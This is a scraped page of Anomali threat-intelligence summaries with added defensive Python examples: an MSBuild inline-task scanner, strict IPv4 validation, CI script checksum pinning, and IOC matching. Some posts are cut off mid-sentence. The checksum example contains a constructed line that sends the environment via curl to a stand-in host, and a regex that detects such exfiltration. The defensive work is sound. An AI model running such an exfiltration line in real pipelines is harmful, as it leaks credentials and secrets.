The project files contain a payload, either Remcos RAT, RedLine, or QuasarRAT, together with shellcode that injects the payload into memory. Because MSBuild.exe, a signed Microsoft binary, compiles and runs the code embedded in the project file, no separate executable has to be written to disk, which lets the malware evade file-based detection. Analyst Comment: Threat actors are always looking for new ways to evade detection. Organizations should deploy endpoint protection that can detect memory-based attacks such as process injection, and should monitor for MSBuild.exe being launched outside of normal build activity (for example from a user’s mail client or browser download path) or spawning unexpected child processes. MITRE ATT&CK: [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Trusted Developer Utilities - T1127 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Account Discovery - T1087 | [MITRE ATT&CK] File and Directory Discovery - T1083 | Ransomware Malware Vulnerability Threat Guideline APT 36
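The MSBuild technique described above relies on MSBuild’s inline-task feature: a UsingTask element with a CodeTaskFactory (or RoslynCodeTaskFactory) carries C# source that MSBuild compiles and runs at build time. The following scanner is an added example, not code from the page or from the campaign analysis; it flags project files whose inline tasks reference memory-allocation and thread APIs or embed a large byte array. The API name list, the byte-array threshold, and both sample project files are constructed for this example.

```python
"""Heuristic scanner for MSBuild project files carrying inline tasks.

MSBuild's inline-task feature (UsingTask with CodeTaskFactory or
RoslynCodeTaskFactory) compiles and runs C# embedded in the .proj/.csproj
at build time, which is what lets a project file act as a loader
(MITRE ATT&CK T1127.001). This flags inline tasks that reference memory
allocation/thread APIs or carry a large embedded byte array. Heuristics and
sample projects are constructed for this example, not taken from the campaign.
"""
import re
import xml.etree.ElementTree as ET

MSBUILD_NS = "http://schemas.microsoft.com/developer/msbuild/2003"
INLINE_FACTORIES = {"CodeTaskFactory", "RoslynCodeTaskFactory"}

# API names a benign build task has little reason to call (assumed heuristic list).
SUSPICIOUS_CALLS = (
    "VirtualAlloc", "VirtualProtect", "CreateThread", "CreateRemoteThread",
    "WriteProcessMemory", "Marshal.Copy", "DllImport",
)
# 64 or more comma-separated hex bytes in a row, i.e. an embedded blob.
BYTE_ARRAY_RE = re.compile(r"0x[0-9a-fA-F]{2}(?:\s*,\s*0x[0-9a-fA-F]{2}){63,}")


def _local(tag):
    """Strip the XML namespace so old-style and SDK-style projects scan alike."""
    return tag.rsplit("}", 1)[-1]


def scan_msbuild_project(xml_text):
    """Return one finding per inline task in the project (empty list if none)."""
    root = ET.fromstring(xml_text)
    findings = []
    for task in root.iter():
        if _local(task.tag) != "UsingTask":
            continue
        factory = task.get("TaskFactory", "")
        if factory not in INLINE_FACTORIES:
            continue  # ordinary compiled task assembly, nothing is compiled here
        code = "".join(c.text or "" for c in task.iter() if _local(c.tag) == "Code")
        api_calls = sorted(name for name in SUSPICIOUS_CALLS if name in code)
        has_blob = BYTE_ARRAY_RE.search(code) is not None
        findings.append({
            "task": task.get("TaskName"),
            "factory": factory,
            "api_calls": api_calls,
            "large_byte_array": has_blob,
            "suspicious": bool(api_calls) or has_blob,
        })
    return findings


# Constructed sample: an inline task with an 80-byte NOP array and a Win32 import.
SAMPLE_INLINE_TASK = f"""<Project ToolsVersion="4.0" xmlns="{MSBUILD_NS}">
  <Target Name="Build"><Dropper /></Target>
  <UsingTask TaskName="Dropper" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\\Microsoft.Build.Tasks.v4.0.dll">
    <Task><Code Type="Class" Language="cs"><![CDATA[
      using System; using System.Runtime.InteropServices;
      public class Dropper : Microsoft.Build.Utilities.Task {{
        [DllImport("kernel32")] static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p);
        byte[] buf = new byte[] {{ {', '.join(['0x90'] * 80)} }};
        public override bool Execute() {{ return true; }}
      }}
    ]]></Code></Task>
  </UsingTask>
</Project>"""

# Constructed sample: a plain SDK-style project with no inline task.
SAMPLE_BENIGN = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup><OutputType>Exe</OutputType><TargetFramework>net6.0</TargetFramework></PropertyGroup>
</Project>"""


if __name__ == "__main__":
    for finding in scan_msbuild_project(SAMPLE_INLINE_TASK):
        print(finding)
    print(scan_msbuild_project(SAMPLE_BENIGN))
```

A legitimate inline task still produces a finding (with `suspicious` set to False), which is deliberate: every project that compiles code at build time is worth knowing about, and the API and blob checks only rank them.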
Anomali.webp 2021-05-17 20:44:00 Cyber Self-Defense Is Not Complicated (lien direct) Anomali Sr. Director of Cyber Intelligence Strategy A.J. Nash recently penned a column for United States Cybersecurity Magazine about how few people in the modern world are immune to the threat of a cyber-attack, and hence the importance of cyber self-defense. In “Cyber Self-Defense Is Not Complicated,” A.J. talks about why a personal commitment to a few basic habits is an increasingly effective way to minimize the risks that certainly lurk. Whether it be texts that include personal content not meant for public consumption, emails, hard drives, cloud storage containing sensitive business information, or the endless supply of financial transaction data that most of us pass across the Internet daily, few people in the modern world are immune to the threat of a cyber-attack. Hence, the importance of cyber self-defense. The most common avenue of attack for cyber actors continues to be phishing. Phishing enables cybercriminals to gain the access needed for a ransomware attack, cyber extortion, or the theft of personally identifiable information (PII), which is used to steal money or identities. While the threat of compromise may be daunting to many who do not see themselves as very technical, even those with limited knowledge can employ a few simple techniques and tools to greatly reduce the potential for being compromised. Before we talk solutions, let us briefly examine the common threats most of us face and nearly all of us can minimize through simple cyber self-defense. 4 Common Threats Faced in Cyberspace Phishing: Someone poses as a legitimate institution or individual in an email or text to lure victims into providing sensitive data such as PII, banking and credit card details, and passwords. Ransomware: Malware that prevents or limits users from accessing their system, either by locking the system’s screen or by encrypting the users’ files until a ransom is paid. 
Theft of PII: The theft of data that may include a Social Security number, date of birth, driver’s license number, bank account and financial information, as well as a passport number. All this data can be assembled into a full financial record file (AKA “fullz”) for identity theft. These reportedly sell for as little as $8 each on cybercriminal markets across the Dark Web. Cyber Extortion/Blackmail: A crime in which a threat actor demands payment to prevent the release of potentially embarrassing or damaging information. In most cases involving individual victims (not companies), the threat actor only pretends to have compromised the victim’s computer or an account tied to something embarrassing. As “evidence” of access, the actor quotes credentials that were actually gathered from a previously published breach. Because people commonly reuse the same credentials across multiple accounts, this bluff often works, leading the victim to hand over more embarrassing content for extortion, pay money, or both. Cyber Self-Defense Practices: Safely Using Wi-Fi and Bluetooth Wireless connectivity to the Internet and other devices is one of the most convenient inventions in recent memory. Unfortunately, these technologies also come with risks many users fail to recognize or mitigate. Thankfully, it only takes a few simple changes to greatly reduce the risk of personal compromise and practice cyber self-defense. Keep Wi-Fi and Bluetooth features turned off on mobile phones and la Malware Hack Threat Guideline
Anomali.webp 2021-05-10 17:56:00 Rise of the Chief Intelligence Officer (CINO) (lien direct) Anomali Sr. Director of Cyber Intelligence Strategy A.J. Nash recently penned a column for United States Cybersecurity Magazine about how changing security challenges call for new skillsets and leadership professionals who can help to develop and run new programs that keep pace with modern adversaries. In “Rise of the Chief Intelligence Officer (CINO),” A.J. makes a case for why this position is needed and what such a leader’s skill set and experience should include. It is republished here in its entirety and with full permission. In response to growing threats in cyberspace, private sector organizations began creating intelligence programs nearly a decade ago, usually referred to as Cyber Threat Intelligence (CTI). In theory, the private sector was attempting to replicate what the government has successfully done for generations: gain an informational advantage to prevent enemy victories and mitigate damage from enemy successes. While most large enterprises today have some sort of a CTI program, the majority are using the word “intelligence” without the tradecraft, standards, or processes to support the label. “Intelligence” in the private sector is still primarily tactical and technical cybersecurity led by people with backgrounds to match. Best practices for collection, production, and dissemination of intelligence are rarely known by those charged with the responsibilities of an intelligence organization. Moreover, only a handful of companies have integrated intelligence into enterprise-wide processes for optimization of outputs that meet documented organizational goals and objectives. Instead of being intelligence-driven security practices, much of the private sector remains underinvested and underprepared. 
Worse yet, most organizations with CTI programs, even effective ones, restrict their own ability to capitalize on the time and money invested in CTI because their vision for intelligence is limited to the Security Operations Center (SOC). The root cause for these challenges is a fundamental misunderstanding of intelligence, born of ignorance of the differences between cybersecurity and intelligence as independent career fields. Instead of being focused on Indicators of Compromise (IOCs), signatures, and response actions, intelligence should be a means of countering threats, cybersecurity or otherwise, and driving enterprise-wide improvements in risk reduction. The answer to this challenge is to capitalize on the lessons learned by the U.S. Government (USG) regarding intelligence. Just as there is a Director of National Intelligence (DNI) who reports directly to the President and leads the U.S. Intelligence Community “in intelligence integration, forging a community that delivers the most insightful intelligence possible,”[1] private sector enterprises each need a single intelligence leader reporting directly to the CEO, President, or Board of Directors. Instead of the sole intelligence function of a company being a CTI team buried inside the SOC and focused on defensive cyber operations or the needs of the Chief Information Security Officer (CISO), establishment of the Chief Intelligence Officer (CINO) will enable companies to maximize the value of their investments, eliminate redundancies, and reduce risk. In the 1980s, as C-suites expanded to include Chief Information Officers (CIO), and in the 2010s, to include Chief Security Officers (CSO) and Chief Human Resources Officers (CHRO), it is time to open a new seat at the table for the first Chief Intelligence Officer (CINO). The Ideal CINO Candidate When adding a chair in the boardroom, it is important to assess what unique value the new addition will bring to the Executive Staff (E-Staff). 
The skills and experiences needed for the newly minted CINO start with a deep knowledge of traditional intelligence standards and practices as well as impeccable integrity and judgement. This will be the senior expert on Intelligence a Threat Guideline
Anomali.webp 2021-05-04 15:25:00 Anomali Cyber Watch: Microsoft Office SharePoint Servers Targeted with Ransomware, New Commodity Crypto-Stealer and RAT, Linux Backdoor Targeting Users for Years, and More (lien direct) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Data Theft, Backdoor, Ransomware, Targeted Ransomware Attacks and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Python Also Impacted by Critical IP Address Validation Vulnerability (published: May 1, 2021) Researchers have recently found that a bug previously discovered in the netmask npm package (a tool to assist with IP address scoping) is also present in recent versions of Python 3. The bug involves the handling of leading zeros in dotted-decimal IPv4 addresses. Instead of rejecting such octets, or treating them as octal the way many other parsers (including the inet_aton convention) do, the Python ipaddress module silently strips the leading zeros and interprets the remaining digits as decimal, so “0127.0.0.1” is read as 127.0.0.1 by Python but as 87.0.0.1 by an octal-aware resolver. Any program that validates an address with one interpretation and connects with another can have its checks bypassed, which exposes programs that rely on Python’s standard-library ipaddress module to Server-Side Request Forgery (SSRF), Remote File Inclusion (RFI), and Local File Inclusion (LFI). The fix, shipped in Python 3.9.5 and 3.8.10, makes ipaddress raise ValueError on any leading zero. Analyst Comment: Best practices for developers include strict input validation, which in this case means rejecting IP address literals with leading zeros (or any non-canonical form) before they reach the parser, rather than relying on the library’s leniency. Additionally, regular patch and update schedules will allow for rapid addressing of bugs as they are discovered and patches delivered. Proper network monitoring and egress policies are also an important part of protecting against these types of attacks. 
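The following is an added example, not code from the page or from the CPython fix, of the validation the Analyst Comment calls for: a canonical-form check in front of Python’s `ipaddress` module so the outcome does not depend on which interpreter version is installed. It also shows side by side how the decimal-stripping and octal interpretations read the same leading-zero string, and applies the strict parser in an SSRF-style allow-list check. The sample addresses and CIDR ranges are constructed for this example.

```python
"""Canonical IPv4 validation in front of Python's ipaddress module.

Python's ipaddress (before 3.9.5 / 3.8.10) silently dropped leading zeros,
so "0127.0.0.1" became 127.0.0.1 while octal-aware resolvers read the same
octet as 87. A check that uses one interpretation and a client that connects
using another can be bypassed. Validate the textual form before parsing,
rather than trusting any one library's leniency. Sample addresses are
constructed for this example.
"""
import ipaddress
import re

# Each octet is "0" or a 1-3 digit number with no leading zero; range is checked afterwards.
_OCTET = r"(?:0|[1-9][0-9]{0,2})"
CANONICAL_IPV4_RE = re.compile(rf"^{_OCTET}(?:\.{_OCTET}){{3}}$")


def is_canonical_ipv4(text):
    """True only for dotted-quad text with no leading zeros and four octets in 0-255."""
    if not CANONICAL_IPV4_RE.match(text):
        return False
    return all(int(octet) <= 255 for octet in text.split("."))


def parse_ipv4_strict(text):
    """Parse to ipaddress.IPv4Address, raising ValueError for any non-canonical form."""
    if not is_canonical_ipv4(text):
        raise ValueError(f"rejecting non-canonical IPv4 literal: {text!r}")
    return ipaddress.IPv4Address(text)


def interpret_legacy(text, octal_leading_zero):
    """Show how two lenient parsers read the same string.

    octal_leading_zero=False mirrors the vulnerable ipaddress behaviour
    (leading zeros stripped, remainder decimal); True mirrors inet_aton-style
    octal. Raises ValueError for anything that is not four numeric octets.
    """
    octets = []
    for part in text.split("."):
        if not part.isdigit():
            raise ValueError(text)
        base = 8 if octal_leading_zero and len(part) > 1 and part[0] == "0" else 10
        value = int(part, base)
        if value > 255:
            raise ValueError(text)
        octets.append(str(value))
    if len(octets) != 4:
        raise ValueError(text)
    return ".".join(octets)


def is_allowed_target(text, allowed_cidrs):
    """Allow-list check for an outbound request target (SSRF guard): the literal
    must be canonical and fall inside one of the allowed networks."""
    try:
        addr = parse_ipv4_strict(text)
    except ValueError:
        return False
    return any(addr in ipaddress.ip_network(cidr) for cidr in allowed_cidrs)


if __name__ == "__main__":
    for literal in ("0127.0.0.1", "010.0.0.5"):
        print(literal, "decimal-stripped:", interpret_legacy(literal, False),
              "octal:", interpret_legacy(literal, True),
              "canonical:", is_canonical_ipv4(literal))
```

Rejecting the non-canonical text outright is safer than normalising it: a normaliser has to pick one interpretation, and whichever it picks will disagree with some downstream resolver.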
Tags: CVE-2021-29921, python Codecov Begins Notifying Affected Customers, Discloses IOCs (published: April 30, 2021) Codecov has disclosed multiple IP addresses as IOCs that were used by the threat actors to collect sensitive information (environment variables) from affected customers. The company disclosed a supply-chain breach on April 15, 2021, and has now begun notifying customers. The breach went undiscovered for two months: the actor modified the Codecov Bash Uploader script, which a large number of CI pipelines fetch and execute at build time, so that it sent the build environment, and with it any CI secrets held in environment variables, to an actor-controlled server. Analyst Comment: In light of the increasing frequency and sophistication of supply chain attacks, companies should audit which third-party scripts and packages their build pipelines execute, pin them to verified checksums or signatures rather than fetching the latest version at build time, scope CI secrets to the jobs that need them, rotate any credential exposed to a compromised pipeline, and include third-party compromise in their threat modelling and detection planning. A resilient and tested backup and restore policy is an important part of the overall security strategy. Tags: North America, Codecov, supply chain FBI Teams up with ‘Have I Been Pwned’ to Alert Emotet Victims (published: April 30, 2021) The FBI has shared more than 4.3 million email addresses with the data breach notification site Have I Been Pwned, which lets users check whether their email address appears in data collected by Emotet. In total, 4,324,770 email addresses were provided, spanning a wide range of countries and domains. The addresses come from two separate corpuses of data obtained by law enforcement. Analyst Comment: Frequently updated endpoint detection policies as well as network security Ransomware Data Breach Malware Tool Vulnerability Threat Patching Guideline
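The Codecov item above is the case for pinning any vendor script a pipeline executes. The example below is added here and is not Codecov’s or Anomali’s code: it verifies a downloaded script against a digest obtained out of band before running it, and applies a simple heuristic for lines that ship the environment to a remote host. The uploader script, the “pinned” digest (derived from the sample only for demonstration; in practice it comes from the vendor’s published, signature-checked SHA256SUM file, never from the download itself), the tampered copy, and the `collector.invalid` host are all constructed for this example.

```python
"""Pin a vendor-supplied shell script to a published checksum before running it.

The Codecov Bash Uploader compromise worked because CI jobs fetched and
executed the latest script from the vendor's host. Verifying the download
against a checksum obtained out of band (the vendor's published SHA256SUM
file, ideally signature-checked) turns a silent modification into a hard
failure. The script, the pinned digest and the tampered copy below are
all constructed for this example; in practice PINNED_SHA256 comes from the
vendor, never from the artifact you just downloaded.
"""
import hashlib
import hmac
import os
import re
import subprocess
import tempfile

SAMPLE_UPLOADER = b"""#!/bin/bash
# constructed stand-in for a coverage uploader
echo "uploading coverage report"
"""
# Assumed: taken from the vendor's signed SHA256SUM file; derived here only for the demo.
PINNED_SHA256 = hashlib.sha256(SAMPLE_UPLOADER).hexdigest()

# Constructed tampered copy: one added line that ships the environment to an external host.
TAMPERED_UPLOADER = SAMPLE_UPLOADER + b'curl -s -d "$(env)" https://collector.invalid/ci\n'

# Heuristic: a line that both reads the process environment and makes a network call.
ENV_EXFIL_RE = re.compile(
    r"(\$\(env\)|printenv|`env`).*\b(curl|wget)\b|\b(curl|wget)\b.*(\$\(env\)|printenv|`env`)"
)


def verify_script(script_bytes, expected_sha256_hex):
    """Constant-time comparison of the script's SHA-256 to the pinned digest."""
    actual = hashlib.sha256(script_bytes).hexdigest()
    return hmac.compare_digest(actual, expected_sha256_hex.lower())


def suspicious_lines(script_bytes):
    """1-based line numbers of lines that look like environment exfiltration."""
    text = script_bytes.decode("utf-8", errors="replace")
    return [i for i, line in enumerate(text.splitlines(), 1) if ENV_EXFIL_RE.search(line)]


def run_verified(script_bytes, expected_sha256_hex):
    """Refuse to execute unless the digest matches; otherwise run it and return the exit code."""
    if not verify_script(script_bytes, expected_sha256_hex):
        raise RuntimeError("uploader checksum mismatch; refusing to execute")
    with tempfile.NamedTemporaryFile("wb", suffix=".sh", delete=False) as fh:
        fh.write(script_bytes)
        path = fh.name
    try:
        return subprocess.run(["bash", path], check=False).returncode
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print("pinned copy verifies:", verify_script(SAMPLE_UPLOADER, PINNED_SHA256))
    print("tampered copy verifies:", verify_script(TAMPERED_UPLOADER, PINNED_SHA256))
    print("suspicious lines in tampered copy:", suspicious_lines(TAMPERED_UPLOADER))
```

The digest check is the control; the exfiltration heuristic is only a second opinion for scripts you have not pinned yet, since an attacker who can edit the script can also obfuscate the call.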
Anomali.webp 2021-04-13 15:49:00 Anomali Cyber Watch: Android Malware, Government, Middle East and More (lien direct) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cobalt Group, FIN6, NetWalker, OilRig, Rocke Group, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Iran’s APT34 Returns with an Updated Arsenal (published: April 8, 2021) Check Point Research discovered evidence of a new campaign by the Iranian threat group APT34. The threat group has been actively retooling and updating its payload arsenal to try to avoid detection. They have created several different malware variants whose ultimate purpose remains the same: to gain an initial foothold on the targeted device. Analyst Comment: Threat actors are always innovating new methods and updating the tools used to carry out attacks. Always practice Defense in Depth (do not rely on a single security mechanism; security measures should be layered, redundant, and failsafe). 
MITRE ATT&CK: [MITRE ATT&CK] Command-Line Interface - T1059 | [MITRE ATT&CK] Exploitation of Remote Services - T1210 | [MITRE ATT&CK] Spearphishing Attachment - T1193 | [MITRE ATT&CK] Custom Cryptographic Protocol - T1024 | [MITRE ATT&CK] Web Service - T1102 | [MITRE ATT&CK] Remote File Copy - T1105 | [MITRE ATT&CK] Scripting - T1064 Tags: OilRig, APT34, DNSpionage, Lab Dookhtegan, TONEDEAF, Dookhtegan, Karkoff, Government, Middle East New Wormable Android Malware Spreads by Creating Auto-Replies to Messages in WhatsApp (published: April 7, 2021) Check Point Research recently discovered Android malware on Google Play, hidden in a fake application, that is capable of spreading itself via users’ WhatsApp messages. The malware automatically replies to the victim’s incoming WhatsApp messages with a payload received from a command-and-control (C2) server. This method could have enabled threat actors to distribute phishing links, spread false information, or steal credentials and data from users’ WhatsApp accounts, among other abuses. Analyst Comment: Users’ personal mobile devices often carry enterprise applications (multi-factor authenticators, email clients, etc.), which extends the risk to the enterprise. Users should be wary of download links or attachments received via WhatsApp or other messaging apps, even when they appear to come from trusted contacts or messaging groups. The latest security patches should be installed for both applications and the operating system. Tags: Android, FlixOnline, WhatsApp Ransomware Malware Vulnerability Threat Guideline APT 34
Anomali.webp 2021-03-17 18:03:00 Anomali Cyber Watch: APT, Ransomware, Vulnerabilities and More (lien direct) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, AlienBot, Clast82, China, DearCry, RedXOR, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Google: This Spectre proof-of-concept shows how dangerous these attacks can be (published: March 15, 2021) Google has released proof-of-concept (PoC) code demonstrating the practicality of Spectre side-channel attacks against a browser’s JavaScript engine to leak information from its memory. Spectre abuses speculative execution in modern CPUs to leak secrets such as passwords from one site to another. While the PoC demonstrates the JavaScript Spectre attack against Chrome 88’s V8 JavaScript engine on an Intel Core i7-6500U CPU on Linux, Google notes it can easily be tweaked for other CPUs, browser versions and operating systems. Analyst Comment: Side-channel attacks are likely to be found across many architectures and are difficult (and in some cases impossible) to remediate in software. The PoC of the practicality of performing such an attack from JavaScript emphasises that developers of both software and hardware must be aware of these types of attacks and the means by which they can be used to invalidate existing security controls. Tags: CVE-2017-5753 Threat Assessment: DearCry Ransomware (published: March 12, 2021) A new ransomware strain is being used by actors to attack unpatched Microsoft Exchange servers. 
Microsoft released patches for four vulnerabilities that are being exploited in the wild. The initial round of attacks included installation of web shells onto affected servers that could be used to infect additional computers. While the initial attack appears to have been carried out by sophisticated actors, the ease of exploitation and publicity around these vulnerabilities has led to a diverse group of actors all attempting to compromise these servers. Analyst Comment: Patch and asset management are a critical and often under-resourced aspect of defense in depth. As this particular set of vulnerabilities and attacks are against locally hosted Exchange servers, organizations may want to assess whether a hosted solution makes sense from a risk standpoint. MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted - T1022 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Email Collection - T1114 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] System Service Discovery - T1007 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | Ransomware Tool Vulnerability Threat Guideline Wannacry APT 41 APT 34
Anomali.webp 2021-03-16 15:07:00 An Intelligence-Driven Approach to Extended Detection and Response (XDR) (lien direct) Threat detection isn’t getting any easier. Today’s threat actors are escalating the number of attacks they launch, going after more targets, using increasingly sophisticated techniques, and achieving their goals through surreptitiousness – not notoriety. With more than 2,000 security vendors catalogued and organizations reporting an average of 45 security solutions deployed, why aren’t we any closer to solving the threat detection gap? To answer this question, we first need to ask, what are we trying to achieve? For years now, we have known that the “whack-a-mole” approach of detecting discrete threats is at best a stopgap for the next inevitable attack. At a high level, most would likely agree that the always-shifting nature of adversaries, the emergence of new vulnerabilities and exploits, and the all-menacing “zero day” lead to the continued proliferation of incidents ranging across data breaches, ransomware, cyberespionage, etc. As soon as we close one door to attackers, they find and open another. This has always been the case. There’s more to this though. We think some of the answer can be found in the failure to fully optimize and connect existing tools, processes, and people to give them broader visibility over traffic and threats moving in and out of their networks while seamlessly layering in detection and response capabilities. As we were told in a recent discussion with an industry analyst, “We’ve reached an inflection point. Enterprises know that the resources needed to greatly improve their security operations exist; they are now hungry to start using them to their maximum potential.” In other words, “We know the goods are available, how do we start using them to better find and neutralize the bad actors?” Enter Extended Detection and Response (XDR) You may have noticed lately that XDR is white hot in the security world. 
Scores of vendors are entering the fray — ranging across small startups to established 800-pound gorillas. Dozens of industry analysts are quickly validating XDR as more than just a buzzword, with Gartner adding XDR to the “innovation trigger” on the newly created Security Operations Hype Cycle. As a long-time member of the security technology community, I can add that while we have certainly seen enthusiasm for trends at different periods, the level that XDR is generating reminds me of three other significant movements that changed the course of computing and security. The first was for Security Information and Event Management (SIEM), which I experienced during my time as a founder at ArcSight. The second was during the “big data” era. The third was for “cloud,” which in many ways has been reinvigorated due to COVID. XDR: What is it? Multiple definitions exist. We think of XDR as an architecture and in terms of how enterprises can leverage it to maximize the performance of their overall security investment (people, technologies, services) to take action against threats at the fastest possible speed. As leaders in the threat intelligence market and with deference to the essential role that global threat intelligence plays in accelerating detection and response, we offer up the following working definition: Organizations that run on top of XDR architectures are able to move closer to managing their security infrastructure as an integrated, unified platform. With XDR, Security Operations Centers (SOCs) can break silos to converge all security data and telemetry collected and generated by the security technologies they’ve deployed (tech that includes firewalls, EDR, CASB, SIEM, SOAR, TIP, etc.). With this information, they can generate strategic threat intelligence that empowers Vulnerability Threat Patching Guideline
Anomali.webp 2021-02-22 21:21:00 An Intelligent, New Approach to Old Cybersecurity Challenges (lien direct) How to Optimize SIEM Performance With Threat Intelligence and IOC Matching The nature of information technology is such that it is always expanding and being innovated at a pace that can be daunting to keep up with. The cybersecurity market in particular is constantly updating itself with the development of new technologies, methodologies, and best practices to deal with equally evolving cyberthreats. The security challenges faced by enterprise clients, however, have changed very little over the past couple of decades. They still want better visibility into the threats targeting them, they still struggle with data overload, and they still suffer from a shortage of human resources. The question is, why do these challenges still exist despite the progress we’ve made in establishing security standards and building better technologies? Challenge 1: Integration By taking a closer look at the cybersecurity deployments amongst large corporations, I have spotted some trends that lead to these challenges. Most of the enterprise clients I assist have many different security products in their environment. They address different use cases but are rarely cross-integrated. You could call these clients’ infrastructures ‘heterogeneous’, given how the technologies and the staff using them are effectively siloed. These silos slow down cross-communication, slow attack response times, and leave legacy systems overlooked and often under-utilized. Challenge 2: Data Overload, Staffing Shortfall The advent of SIEM technology in the early 2000s has been a positive game changer for the cybersecurity industry. It also put a glaring spotlight on security challenges. When properly configured and manned, SIEMs keep users aware of all kinds of malicious activity occurring within their networks. 
However, ever-expanding IT environments mean ever-expanding log volumes, which require more storage space, more processing power, and more analysts to triage the high number of alerts that SIEMs generate every day. Why more analysts? Because a classic SOC model has Tier 1 analysts who triage alerts, Tier 2 analysts who perform incident response and remediation, and Tier 3 analysts running forensics and pentesting… And a fair share of these tasks are performed manually! Challenge 3: Technology Advances Faster than We Can Hire In the last decade, the democratization of cyber threat intelligence has added an extra strain on SIEMs as clients want to use them to compare external threat data to internal logs. In terms of order of magnitude, we’re talking about comparing tens, if not hundreds of millions of indicators of compromise (IOCs) to billions, if not trillions of events in a SIEM in real time. Though it’s possible in theory, it’s nowhere near efficient in practice: try querying your SIEM for whether a small list of just 1,000 Command & Control IP addresses was contacted by your assets in the past year and then tell me how many hours that search will take. The flood of data combined with staffing constraints leaves organizations at a disadvantage, despite the advancements SIEMs continue to make. Meeting the Challenges, Supercharging the SIEM SIEMs aren’t going anywhere, and they shouldn’t; they’ve proven their value. When it comes to optimizing their capabilities, threat intelligence can make a major difference. For example, filtering a subset (fraction) of the total number of IOCs that are linked to threats most likely to target a company, and then comparing that data to the most recent SIEM event logs (e.g., last 90 days), enables more effective detection. However, a limited query such as this does not cover threat actors’ typical dwell time, and by omitting the majority of the IOCs from the query, its effectiveness is lessened. 
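The scaling problem described above (a feed of millions of indicators against billions of events) is a matter of per-event cost: if every event requires scanning the indicator list, the query time grows with both. The following is an added example, not code from the page or from Anomali’s products, of the usual way around it: exact-host indicators go into a hash map and CIDR indicators are keyed by their prefix bits, so each event needs one lookup per distinct prefix length in the feed rather than a pass over the feed. The feed, the event lines and their key=value format are constructed for this example, using RFC 5737 documentation ranges, and are not real indicators.

```python
"""Match a C2 indicator feed against SIEM-style events in one pass.

Comparing millions of IOCs to billions of events is only tractable if each
event costs a constant number of lookups, independent of feed size. This
indexes single addresses in a hash map and CIDR indicators by prefix length,
so every event needs at most one lookup per distinct prefix length present in
the feed, not a scan of the feed. Feed entries and events are constructed
(RFC 5737 documentation ranges), not real indicators.
"""
import ipaddress
import re
from collections import defaultdict

# Constructed feed: (indicator, label). Real feeds also carry confidence and first/last seen.
IOC_FEED = [
    ("198.51.100.23", "c2-exampleRAT"),
    ("203.0.113.0/24", "c2-exampleLoader"),
]

# Constructed firewall events in a key=value format; the last line is deliberately malformed.
SAMPLE_EVENTS = """2021-02-20T10:01:02Z src=10.1.4.22 dst=198.51.100.23 dport=443 action=allow
2021-02-20T10:01:05Z src=10.1.4.22 dst=93.184.216.34 dport=443 action=allow
2021-02-20T10:02:11Z src=10.1.7.9 dst=203.0.113.77 dport=8080 action=allow
2021-02-20T10:03:30Z src=10.1.4.22 dst=198.51.100.24 dport=443 action=allow
malformed line that the parser must skip"""

EVENT_RE = re.compile(r"^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)")


class IocIndex:
    """IPv4 indicator index: exact hosts in a dict, networks keyed by prefix bits."""

    def __init__(self, feed):
        self.exact = {}
        self.by_prefix = defaultdict(dict)  # prefixlen -> {network_bits: label}
        for indicator, label in feed:
            net = ipaddress.ip_network(indicator, strict=False)
            if net.version != 4:
                continue  # IPv6 would need 128-bit shifts; out of scope for this example
            bits = int(net.network_address)
            if net.prefixlen == 32:
                self.exact[bits] = label
            else:
                self.by_prefix[net.prefixlen][bits >> (32 - net.prefixlen)] = label
        self.prefixlens = sorted(self.by_prefix, reverse=True)  # most specific first

    def lookup(self, ip_text):
        """Label of the matching indicator, or None. Unparseable input is not an error."""
        try:
            bits = int(ipaddress.IPv4Address(ip_text))
        except ValueError:
            return None
        label = self.exact.get(bits)
        if label:
            return label
        for plen in self.prefixlens:
            label = self.by_prefix[plen].get(bits >> (32 - plen))
            if label:
                return label
        return None


def match_events(events_text, index):
    """Stream events line by line and return every src/dst field that hit an indicator."""
    hits = []
    for line in events_text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        for field in ("src", "dst"):
            label = index.lookup(m[field])
            if label:
                hits.append({"ts": m["ts"], "field": field, "ip": m[field], "ioc": label})
    return hits


if __name__ == "__main__":
    for hit in match_events(SAMPLE_EVENTS, IocIndex(IOC_FEED)):
        print(hit)
```

The same structure is what makes it feasible to run the full feed against a long retention window instead of a 90-day slice: the cost of adding indicators is memory, not per-event time.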
So now that we have a better understanding of why enterprise clients are still struggling with the challenges of threat visibility, data overload Threat Guideline
